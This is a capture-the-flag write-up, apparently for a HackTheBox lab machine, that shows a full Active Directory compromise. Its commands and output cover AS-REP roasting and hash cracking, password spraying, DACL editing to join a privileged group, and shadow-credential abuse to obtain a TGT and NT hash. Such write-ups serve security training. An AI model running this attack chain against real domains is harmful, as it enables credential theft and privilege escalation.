- First we get the domain name to edit our etc hosts file
netexec smb 10.10.11.181
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
- Domain name: absolute.htb
- Netbios name: DC
- We get some users with the author name on the picture and we got a nice wordlist of possible username, let's check which one is valid
- Magenta: user exist
- Orange: user is kerberoastable
Great !
- Getting the hash of the kerberoastable user d.klay
netexec ldap 10.10.11.181 -u d.klay -p '' --asreproast /tmp/hash
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 445 DC $krb5asrep$23$d.klay@ABSOLUTE.HTB:519e158a866f1c05b1f487703351ba66$53bb37f684b7a6b525cf5b170721a77d192733c1d920407ca29636b619f759d74ee162763b61bd80bfa946711e9ae2a81ea82fe028a6453eaa6f056d7c7082599c67d49f02880fdf174f93ad3da5c3d5bbca9ac8a0e032f9989cfe0d4b9e806085aaaafb1964a0446d74f97ca61e32aa52558be9b0824ce4018ee9134039e3cead40b851850e67e20c0e22f2384f385e968991c52382f6db347d7a36101dfb2520ee8f05a094e0671369f7a60d2a545f57b3cfea0641f995ac440e7d0df586547e61fd81372ee01f693133961d79bb04a5b9060b7d0ee54d3f7756839d65a9dbbccf687209ad388783ccdbb4
-
Crack it with hashcat and you get password:
Darkmoonsky248girl -
We try to connect but we get STATUS_ACCOUNT_RESTRICTION aka NO NTLM
netexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl'
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION
- We adjust to the clock of the remote dc to avoid the error KRB_AP_ERR_SKEW and we use kerberos to connect with option -k
sudo timedatectl set-ntp 0
sudo ntpdate 10.10.11.181
netexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
- We use this account to check the other users and we found another user and pass: AbsoluteSMBService123!
netexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP 10.10.11.181 389 DC [*] Total of records returned 20
LDAP 10.10.11.181 389 DC Administrator Built-in account for administering the computer/domain
LDAP 10.10.11.181 389 DC Guest Built-in account for guest access to the computer/domain
LDAP 10.10.11.181 389 DC krbtgt Key Distribution Center Service Account
LDAP 10.10.11.181 389 DC J.Roberts
LDAP 10.10.11.181 389 DC M.Chaffrey
LDAP 10.10.11.181 389 DC D.Klay
LDAP 10.10.11.181 389 DC s.osvald
LDAP 10.10.11.181 389 DC j.robinson
LDAP 10.10.11.181 389 DC n.smith
LDAP 10.10.11.181 389 DC m.lovegod
LDAP 10.10.11.181 389 DC l.moore
LDAP 10.10.11.181 389 DC c.colt
LDAP 10.10.11.181 389 DC s.johnson
LDAP 10.10.11.181 389 DC d.lemm
LDAP 10.10.11.181 389 DC svc_smb AbsoluteSMBService123!
LDAP 10.10.11.181 389 DC svc_audit
LDAP 10.10.11.181 389 DC winrm_user Used to perform simple network tasks
- We check the password and it's working
netexec ldap 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123!
- We check the shares of the users
netexec smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k --shares
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123!
SMB 10.10.11.181 445 DC [+] Enumerated shares
SMB 10.10.11.181 445 DC Share Permissions Remark
SMB 10.10.11.181 445 DC ----- ----------- ------
SMB 10.10.11.181 445 DC ADMIN$ Remote Admin
SMB 10.10.11.181 445 DC C$ Default share
SMB 10.10.11.181 445 DC IPC$ READ Remote IPC
SMB 10.10.11.181 445 DC NETLOGON READ Logon server share
SMB 10.10.11.181 445 DC Shared READ
SMB 10.10.11.181 445 DC SYSVOL READ Logon server share
- We check the share file
netexec smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!' -k -M spider_plus
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123!
SPIDER_P... 10.10.11.181 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.11.181 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.11.181 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.181 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.11.181 445 DC [*] OUTPUT: /tmp/cme_spider_plus
┌──(bonclay㉿kali)-[~/NetExec]
└─$ cat /tmp/nxc_spider_plus/DC.absolute.htb.json | jq '. | map_values(keys)'
...
"Shared": [
"compiler.sh",
"test.exe"
]
-
We can get the file test and compiler with smbclient.py or spider_plus. The we run test.exe on windows and notice an ldap connection on port 389 we new credential :
AbsoluteLDAP2022! -
We try the credential we the user we get with option --users
netexec smb 10.10.11.181 -u /tmp/users_p -p 'AbsoluteLDAP2022!' -k
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\M.Chaffrey:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.181 445 DC [-] absolute.htb\D.Klay account vulnerable to asreproast attack
SMB 10.10.11.181 445 DC [-] absolute.htb\s.osvald:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.181 445 DC [-] absolute.htb\j.robinson:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.181 445 DC [-] absolute.htb\n.smith:AbsoluteLDAP2022! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.181 445 DC [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!
- Next step is running bloodhound to check ACL permissions, this is my solution without using Windows
First powerview.py was a big failure for me
(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-DomainObjectAcl -PrincipalIdentity 'm.lovegod' -TargetIdentity 'Network Audit' -Rights WriteMembers -Domain absolute.htb
INFO:root:Found principal identity dn CN=m.lovegod,CN=Users,DC=absolute,DC=htb
INFO:root:Found target identity dn CN=Network Audit,CN=Users,DC=absolute,DC=htb
INFO:root:Adding writemembers privilege to Network Audit
INFO:impacket:Querying domain security descriptor
INFO:impacket:Success! User m.lovegod now has GenericWrite privileges on Network Audit
(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-DomainGroupMember -Identity 'Network Audit' -Members m.lovegod
00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
So let's bring the big gun with this fork of impacket which contains the dcaledit python script made by https://twitter.com/BlWasp_
sudo python3 ~/impacket_sh/examples/dacledit.py absolute.htb/m.lovegod@dc.absolute.htb -k -dc-ip 10.10.11.181 -principal 'm.lovegod' -target-dn 'CN=Network Audit,CN=Users,DC=absolute,DC=htb' -action write -rights FullControl
Impacket for Exegol - v0.10.1.dev1+20230117.112240.e9f1dc78 - Copyright 2022 Fortra - forked by ThePorgs
[*] No credentials supplied, supply password
Password:
[-] CCache file is not found. Skipping...
[*] DACL backed up to dacledit-20230127-231145.bak
[*] DACL modified successfully!
powerview absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
(LDAPS)-[dc.absolute.htb]-[absolute\m.lovegod]
PV > Add-GroupMember -Identity 'Network Audit' -Members m.lovegod
INFO:root:User m.lovegod successfully added to Network Audit
Get-DomainGroup -Identity 'Network Audit'
cn : Network Audit
description : Branch to do some auditing
member : CN=svc_audit,CN=Users,DC=absolute,DC=htb
CN=m.lovegod,CN=Users,DC=absolute,DC=htb
distinguishedName : CN=Network Audit,CN=Users,DC=absolute,DC=htb
instanceType : 4
name : Network Audit
objectGUID : {7f6b4055-29bf-42a0-ba35-19054c311783}
objectSid : S-1-5-21-4078382237-1492182817-2568127209-1119
sAMAccountName : Network Audit
sAMAccountType : 268435456
groupType : -2147483646
objectCategory : CN=Group,CN=Schema,CN=Configuration,DC=absolute,DC=htb
-
m.lovegod is now a member of the group "Network Audit" which has the rigths "genericWrites" over the user: 'winrm_user'
-
Using shadow credential technique and pywisker by https://twitter.com/_nwodtuhs we can get the nt hash of the user winrm
python3 pywhisker.py -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k --target "winrm_user" --action add --filename winrm_c
expected str, bytes or os.PathLike object, not NoneType
[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9c21e640-48a5-9176-09aa-7a14ac891004
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: winrm_c.pfx
[*] Must be used with password: PL9DBGYJiuA7wygXOfd3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
python3 gettgtpkinit.py -cert-pfx ../pywhisker/winrm_c.pfx -pfx-pass PL9DBGYJiuA7wygXOfd3 absolute.htb/winrm_user tgt_winrm
2023-01-27 23:32:12,510 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-01-27 23:32:12,524 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-01-27 23:32:24,639 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-01-27 23:32:24,639 minikerberos INFO 9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1
INFO:minikerberos:9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1
2023-01-27 23:32:24,642 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
KRB5CCNAME=tgt_winrm python3 getnthash.py -key 9258887d53cbb14e70e77d334c4074e4c3785343da2f54a27d8d19c1d72407d1 absolute.htb/winrm_user
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
8738c7413a5da3bc1d083efc0ab06cb2
- We have the NT hash but this is useless since we cannot to ntlm so let's stick with the tgt ticket and use evil-winrm to get the flag